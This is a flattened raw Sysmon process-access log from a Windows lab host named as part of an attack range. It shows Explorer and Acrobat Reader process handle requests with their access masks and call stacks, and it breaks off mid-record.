12:30:26.583{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047552Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.583{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047551Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.578{FE4C2B44-DDF9-63C7-C404-00000000AF02}52002688C:\Windows\Explorer.EXE{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\NPSMDesktopProvider.dll+1be4a|C:\Windows\System32\NPSMDesktopProvider.dll+1226e|C:\Windows\System32\NPSMDesktopProvider.dll+12835|C:\Windows\System32\NPSMDesktopProvider.dll+67dc|C:\Windows\System32\TwinUI.dll+7bfb8|C:\Windows\System32\TwinUI.dll+7559d|C:\Windows\System32\TwinUI.dll+75173|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047550Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.576{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047549Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.576{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047548Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.576{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047547Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.570{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047546Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.567{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8ab30|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047545Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.567{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+1078f0|C:\Windows\System32\SHELL32.dll+8aaec|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047544Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.567{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8aac0|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047543Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.567{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\TwinUI.dll+12ccb9|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047542Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.551{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047541Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.532{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047540Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.495{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047539Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.436{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047538Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.395{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047537Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.341{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047536Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.303{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047535Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.250{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047534Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.212{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047533Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.158{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047532Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.110{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files 